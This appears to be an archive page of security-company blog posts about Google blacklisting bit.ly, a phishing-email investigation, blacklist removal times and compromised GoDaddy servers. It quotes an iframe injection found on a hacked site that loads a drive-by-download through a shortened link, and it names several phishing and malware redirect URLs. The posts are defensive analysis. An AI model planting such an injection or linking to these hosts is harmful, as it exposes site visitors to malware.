Google Blacklists Bit.ly

If you ever shortened a URL using bit.ly or if you use it anywhere, be aware that Google recently blacklisted all bit.ly pages through its Safe Browsing program. It means that anyone using Chrome, Firefox or Safari will get a nasty The site ahead contains malware warning when visiting a bit.ly link:

Screen Shot 2014-10-25 at 10.23.45 AM

Why would Google blacklist bit.ly?

Google has many automated processes to detect if a specific domain is hosting malware, redirecting to malware or somehow being misused to compromise other sites (as an intermediary). It flags thousands of sites every day and it seems that the bit.ly had some redirections that were flagged by their detection process.

This is what their diagnostics page say:

What is the current listing status for bit.ly? Site is listed as suspicious – visiting this web site may harm your computer.

Of the 91549 pages we tested on the site over the past 90 days, 721 page(s) resulted in malicious software being downloaded and installed without user consent.

That generally means that someone shortened a URL that was redirecting to a browser exploit kit that was pushing malware to the visitors visiting this page.

Shortened URL malware

Unfortunately, Google is not completely wrong with this one (but likely a bit excessive, time will tell). We constantly see malware injection on websites leveraging shortened URL links. Here is an example of what we mean, this payload was found in a compromised website:

<iframe src="http://bit.ly/1qJGlE0"nbsp;
name="iframe_name" scrolling="no" frameborder="0" allowfullscreen align="top" height="400px" width="720px">

This iframe injection has a bit.ly link that redirects to a drive-by-download hosted at httx://teamliboza[.]nl/streamplayer1.php. It happens often with bit.ly and other URL shortens. This new blacklisting status could be a change in tide for URL shorteners as Google takes a hard stance against how attackers employ them to distribute malware. That or they could be legitimately blocked, it’s just hard to say at the moment.

Whether they are actually hacked or being tagged for what others are doing will require more time and analysis as it’s a very unique situation. For now however, if you depend on the shortening service, if you want people to see your content it’s best to avoid the service until the issue has been resolved.

Additionally, if you leverage the shortener in your own website this could be impactful to you as your website could get inadvertently blacklisted for loading a blacklisted website. Something to be mindful of. The good news is that the blacklist will be for the shortener, so removing it will address the problem, but the bad news is that most end-users won’t read the details and assume it’s you.

We will keep monitoring this issue closely and we will post an update as soon as we hear more. In the mean time, do not visit bit.ly links and replace them with their real final destination URL.

Update 1: After almost 12 hours, Google removed the ban from Bit.ly. They also changed the diagnostics page to:

What is the current listing status for bit.ly?
This site is not currently listed as suspicious.

Phishing Tale: An Analysis of an Email Phishing Scam

Phishing scams are always bad news, and in light of the Google Drive scam that made the rounds again last week, we thought we’d tell the story of some spam that was delivered into my own inbox because even security researchers, with well though-out email block rules, still get SPAM in our inboxes from time to time.

Here’s where the story begins:

Today, among all the spam that I get in my inbox, one phishing email somehow made its way through all of my block rules.

Spam email in our security team's inbox

Even our security team gets SPAM from time to time.

I decided to look into it a little further. Of course, I wanted to know whether or not we were already blocking the phishing page, but I also wanted to investigate further and see if I could figure out where it came from. Was it from a compromised site or a trojanized computer?

The investigation started with the mail headers (identifying addresses have been changed, mostly to protect my email ☺):

Blog1

The headers tell us that miami.hostmeta.com.br is being used to send the spam. It’s also an alert that some of the sites in this shared server are likely vulnerable to the form: X-Mailer: PHPMailer [version 1.73]. I decided to look into the server and found that it contained quite a few problems. This server hosts about twenty sites, some of which are outdated–WordPress 2.9.2 is the oldest–while others are disclosing outdated web server versions (Outdated Web Server Apache Found: Apache/2.2.22) and still others are blacklisted (http://www.siteadvisor.com/sites/presten.com.br). This makes it pretty difficult to tell where the spam came from, right?

Luckily, there’s another header to help us, Message-ID:. nucleodenegociosweb.com.br is hosted on miami.hostmeta.com.br and it has an open contact form. I used it to send a test message and although the headers are similar, the PHPMailer differs:

Blog2

What Do We Know Now?

We know who is sending the phishing messages, but what host are they coming from? There are some clues in the message body:

blog3

From that image, we can see that http://www.dbdacademy.com/dbdtube/includes/domit/new/ is hosting the image and the link to the phishing scam, but it doesn’t end there. As you can see from the content below, we’ll be served a redirect to http://masd-10.com/contenido/modules/mod_feed/tmpl/old/?cli=Cliente&/JMKdWbAqLH/CTzPjXNZ7h.php, which loads an iframe hosted on http://www.gmff.com.hk/data1/tooltips/new/.

Here is the content:
Phishing email

Problem Solved. Or is It?

In this case, there are three compromised sites being used to deliver the phishing campaign and it’s becoming very common to see this strategy adopted. The problem, from the bad guy’s point of view, is that if they store all of their campaign components on one site, then they lose all of their work when we come in and clean the website. If they split the components up and place them on multiple sites, with different site owners, then it’s unlikely that all of the sites will be cleaned at one time, which means their scam can continue.

As always with malware, it’s not enough for your site to be clean. You also need to rely on everyone else to keep their own site clean. When others don’t, your computer or website can be put at risk.

If you’re interested in technical notes regarding the type of research we do be sure to follow us on Twitter and be sure to check in with our Lab Notes. If you something interesting you’d like us analyze please don’t hesitate to ping us, we’re always looking for a new challenge.

Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to provide you webmasters with the required insight to understand what is going on, and how to troubleshoot things when your website is blacklisted.

Get Your Bearing

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to http://bls.pw/. Two of the goo.gl links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to http://bls.pw/ shortener.

goo.gl/9yBTe - http://bits.wikimedia.org/favicon/wikipedia.ico
goo.gl/hNVXP - http://bits.wikimedia.org/favicon/wikipedia.ico?2x2
goo.gl/24vi1 - http://bls.pw/

A quick search for this last URL took us to /wp-content/themes/Site’sTheme/css/iefix.sct. As malware writers like to do, it was trying to trick us into believing it was good code. In this case, the Sizzle CSS Selector Engine code (Real code here) was the target:

Sucuri  Sizzle CSS Selector Engine Modified III

Read More

Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:

Read More

Google Transparency Report – Malware Distribution

Google just released their Malware Distribution Transparency Report, sharing the amount of sites compromised or distributing malware detected by their systems (Safe Browsing program).

Google’s Safe Browsing program started in 2006 and since has become one of the most useful blacklists to detect and report on compromised sites. They flag around 10,000 different sites per day, which are being used for over 1 billion browser (Chrome, Firefox And Safari) users.

What is really scary from their report is the amount of legitimate compromised sites hosting malware compared to sites developed by the bad guys for malicious purposes. For example, in the first week of Jun/2013, 37,000 legitimate sites were compromised to host malware. At the same time, they only identified around 4,000 sites that were developed for the unique purpose of infecting people.


Read More

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Sent thousands of notifications daily to Internet Service Providers (ISPs)


Read More

Web Hosting Provider ServerPro Hacked, Defaced, & Blacklisted by Google

Even the pro’s are susceptible to attack. Web hosting provider ServerPro has been compromised and completely defaced. This has been ongoing for more than a few days with no resolution.

ServerPro boasts to have over 200,000 clients over a 10 year stand. Although there is no direct proof that this attack affects a wide portion of their client base, we have seen a few of their clients experiencing the same issue.

If you were to visit the site, which we recommend against, you would get the beautiful Google infection banner:

ServerPro Blacklisted by Google

Read More

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.

Read More

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 (13 hours)
  • Minimum time: 290 (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:


Read More